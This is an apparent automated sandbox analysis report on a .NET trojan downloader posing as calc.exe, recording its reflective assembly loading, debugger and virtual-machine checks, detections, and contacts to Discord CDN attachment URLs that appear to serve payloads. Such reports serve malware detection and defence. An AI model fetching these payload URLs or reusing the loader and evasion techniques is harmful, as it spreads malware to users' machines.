Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb source: calc.exe, 00000000.00000000.254647015.0000000002729000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb* source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: C:\Users\jpint\OneDrive\Desktop\BuilderBot\BuilderBot\bin\Release\stub\un_priv\DarkEdition\obj\Release\calc.pdb source: calc.exe
Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.260585475.0000000002F53000.00000004.00000001.sdmp
Source: Binary string: calc.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbh source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb@ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: calc.exe, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.1.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.0.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.calc.exe.320000.0.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.2.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: calc.exeStatic PE information: 0xFB362630 [Mon Jul 23 10:32:16 2103 UTC]
Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: WerFault.exe, 00000005.00000002.291345050.0000000004F73000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
Source: Amcache.hve.5.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: VMware7,1
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000005.00000002.291282032.0000000004EB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.me
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\calc.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\calc.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\calc.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\calc.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Users\user\Desktop\calc.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\calc.exeNetwork Connect: 162.159.135.233 443
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Progman
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\calc.exeQueries volume information: C:\Users\user\Desktop\calc.exe VolumeInformation
Source: C:\Users\user\Desktop\calc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
calc.exe54%VirustotalBrowse
calc.exe12%MetadefenderBrowse
calc.exe27%ReversingLabsByteCode-MSIL.Trojan.Heracles
calc.exe100%AviraTR/Dldr.Agent.gkrrf
calc.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.discor0%URL Reputationsafe
https://cdn.discord0%URL Reputationsafe
https://cdn.discordapp.co0%URL Reputationsafe
https://cdn.discordapp.0%Avira URL Cloudsafe
https://cdn.disc0%URL Reputationsafe
https://cdn.disco0%URL Reputationsafe
https://cdn.discorda0%URL Reputationsafe
https://cdn.d0%URL Reputationsafe
https://cdn.discordap0%URL Reputationsafe
https://cdn.dis0%URL Reputationsafe
https://cdn.discordapp.com40%URL Reputationsafe
https://cdn.discordapp0%URL Reputationsafe
https://cdn.di0%URL Reputationsafe
https://cdn.discordapp.comD80%Avira URL Cloudsafe
https://cdn.discordapp.c0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.135.233
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://cdn.discordapp.com/attachments/897402450376536075/897465559711633408/8NMrqq.txtfalse
      high
      https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.txtfalse
        high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://cdn.discordapp.com/attachments/8972calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
            high
            https://cdn.discordapp.com/attachmentcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
              high
              https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ARTcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                  high
                  https://cdn.discordapp.com/attachments/897223calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    high
                    https://cdn.discorcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.discordcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.discordapp.com/atcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                      high
                      https://cdn.discordapp.cocalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                        high
                        https://cdn.discordapp.com/attachmcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                          high
                          https://cdn.discordapp.com/attachments/897223707649515602/8972285calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                            high
                            https://cdn.discordapp.calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                high
                                https://cdn.disccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                  high
                                  https://cdn.discocalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                    high
                                    https://cdn.discordacalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.discordapp.com/attachments/897223707649515602calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                      high
                                      https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                          high
                                          https://cdn.dcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cdn.discordapp.com/attachments/897223707649515calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                            high
                                            https://cdn.discordapp.com/attachments/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                              high
                                              https://cdn.discordapp.com/attacalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                high
                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asciicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://cdn.discordapp.com/attachments/897223707649515602/89722calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecalc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://cdn.discordapp.com/attachments/8972237076calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://cdn.discordapp.com/attachments/897223707649calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://cdn.discordapcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://cdn.discordapp.com/attachments/897223707calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://cdn.discalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cdn.discordapp.com/attcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://cdn.discordapp.com/attachments/897223707649515602/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://cdn.discordapp.com/attachments/897223707649515602/8972calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://cdn.discordapp.com/attachments/897223707649515602/8972285953181245calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://cdn.discordapp.com/attachments/897223707649515602/89722859531812455calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://cdn.discordapp.com/attachments/897223707649515602/89722859531calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://cdn.discordapp.com/attachments/897calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://cdn.discordapp.com/attachments/89722370764calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://cdn.discordapp.com/attachments/8972237076495156calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ARcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://cdn.discordapp.com/attachments/89722370calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://cdn.discordapp.com/attaccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://cdn.discordapp.com/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/897228595calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/8972285953calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://cdn.discordapp.com4calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://cdn.discordapp.com/attachments/89722370764951calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.discordapp.com/attachcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.discordappcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://cdn.discordapp.comcalc.exe, 00000000.00000002.293292330.0000000002691000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/89722859calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://cdn.dicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://cdn.discordapp.com/attachments/8972237calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.discordapp.com/attachments/897223707649515602/89722859531812calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cdn.discordapp.com/attachments/89calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.discordapp.comD8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.discordapp.ccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.discordapp.com/attachments/897223707649515602/897228595318calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://cdn.discordapp.com/attachmentscalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.discordapp.com/attachments/8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                            high
